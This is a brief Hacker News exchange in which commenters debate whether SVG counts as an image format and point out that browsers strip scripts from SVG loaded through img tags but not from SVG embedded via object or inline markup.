alt Hacker NewsI don't understand why it wasn't immediately understood that SVG is as dangerous as HTML.
It is not, and never was, an image format. It's a markup language.
Replies
recursive • yesterday at 8:29 PM
A markup language can be an image format. The "G" is for "Graphics" after all.
Browsers already treat the same SVG differently depending on how you embed it. <img> strips scripts and external resource loads. <object> and inline don't. People test with img tags, looks fine, then someone switches the embed method and everything opens up.